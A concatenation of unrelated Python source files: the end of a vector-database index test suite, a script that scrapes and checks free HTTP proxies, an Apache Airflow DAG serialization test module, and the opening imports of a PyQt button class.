def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
expected: return code 0, and index instructure
'''
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
expected: return code 0, and index instructure
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
'''
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
logging.getLogger().info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
'''
target: test drop index interface
method: create collection, create partition and add entities in it, create index on collection, call drop collection index
expected: return code 0, and default index param
'''
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
logging.getLogger().info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
logging.getLogger().info("In callback check search result")
logging.getLogger().info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_drop(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True)
logging.getLogger().info("DROP")
connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_collection_name(self, connect):
collection_name = " "
with pytest.raises(Exception) as e:
future = connect.create_index(collection_name, field_name, default_index, _async=True)
res = future.result()
@pytest.mark.tags(CaseLabel.tags_smoke)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_callback(self, connect, collection, get_simple_index):
'''
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
'''
result = connect.insert(collection, default_entities)
logging.getLogger().info("start index")
future = connect.create_index(collection, field_name, get_simple_index, _async=True,
_callback=self.check_result)
logging.getLogger().info("before result")
res = future.result()
# TODO:
logging.getLogger().info(res)
|
get_proxy.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 12 10:10:46 2017
@author: LZR
"""
import requests
from lxml import etree
import threading #多线程处理与控制
import time
base_url = 'http://www.xicidaili.com/wt/'
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'
}
#获取代理ip的网页
def get_html(url):
r = requests.get(url, headers=headers)
r.raise_for_status()
html = r.text
return html
#解析网页,获取代理的ip地址和端口,并以列表的形式返回
def html_parser(html):
result = []
html = etree.HTML(html)
ip_info = html.xpath('//table[@id="ip_list"]/tr')
del ip_info[0]
for ip in ip_info:
res = 'http://' + ip.xpath('td[2]/text()')[0] + ':' + ip.xpath('td[3]/text()')[0]
result.append(res)
return result
#测试代理,并将可用的代理以列表的形式返回
def get_use_proxy(ip):
proxies = {'http': ip}
try:
print('正在测试代理ip:' + ip +'\n')
r = requests.get('http://www.baidu.com', proxies=proxies, timeout=3)
if r.status_code == 200:
print('代理ip:' + ip + '有效可用' + '\n')
save_good_ip(ip) #将测试有效可用的代理ip写入txt文本中
except:
pass
#启动多线程测试ip地址的可用性
def start_test_ip(results):
for ip in results:
th=threading.Thread(target=get_use_proxy,args=(ip,))
th.start() #启动线程
#将爬取到的代理ip写入txt文本中
def save_all_ip(all_ip):
with open('all_ip.txt', 'w') as file:
for ip in all_ip:
file.write(ip + '\n')
print('代理ip写入完毕!')
#先清空上一次爬取后的可用ip
with open('good_ip.txt', 'w') as f:
f.write('')
#将可用的代理ip以追加的形式写入txt文本中
def save_good_ip(ip):
with open('good_ip.txt', 'a') as file:
file.write(ip + '\n')
if __name__ == '__main__':
results = []
page = 6 #爬取的页数
for i in range(0, page):
url = base_url + str(i+1)
html = get_html(url)
result = html_parser(html)
results.extend(result)
save_all_ip(results)
start_test_ip(results)
time.sleep(2)
print("可用ip存储完毕!")
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
from dateutil.relativedelta import FR, relativedelta
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.operators.bash import BashOperator
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {
"__type": "timedelta",
"__var": 300.0
}
}
},
"start_date": 1564617600.0,
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"bash_command": "echo {{ task.task_id }}",
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [
"can_dag_read",
"can_dag_edit"
]
}
}
}
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={
"test_role": {"can_dag_read", "can_dag_edit"}
}
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(task_id='bash_task', bash_command='echo {{ task.task_id }}', owner='airflow')
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
""" Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {
'start_date': datetime(2019, 7, 10)
}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={
'hello': lambda name: 'Hello %s' % name
},
catchup=False
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=('{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}')))
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(
serialized_dags['simple_dag'],
serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(
json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"],
key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(
target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags([
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
])
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(dag, field), \
f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _someting_.
assert k in serialized_dag.default_args
else:
assert v == serialized_dag.default_args[k], \
f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(self, serialized_task, task,):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type', 'subdag',
# Type is exluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback', 'on_success_callback', 'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(task, field), \
f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 2)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 8, 1)),
])
def test_deserialization_start_date(self,
dag_start_date,
task_start_date,
expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
@parameterized.expand([
(datetime(2019, 8, 1), None, datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 8, 2), datetime(2019, 8, 1)),
(datetime(2019, 8, 1), datetime(2019, 7, 30), datetime(2019, 7, 30)),
])
def test_deserialization_end_date(self,
dag_end_date,
task_end_date,
expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1),
end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand([
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
])
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand([
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}})
])
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand([
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
])
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val,
start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
]
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, [
'BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand([
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}}),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(nested1=ClassWithCustomAttributes(att1="{{ task.task_id }}",
att2="{{ task.task_id }}",
template_fields=["att1"]),
nested2=ClassWithCustomAttributes(att3="{{ task.task_id }}",
att4="{{ task.task_id }}",
template_fields=["att3"]),
template_fields=["nested1"]),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', "
"'att4': '{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
])
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert BaseOperator(task_id='dummy').do_xcom_push is True, \
"Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual({'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream'}, fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
)
|
UpdateButton.py
|
import os
import sys
from PyQt5.QtWidgets import QLabel
import logging
from Parents import Button
import pkg_resources
import json
import sys
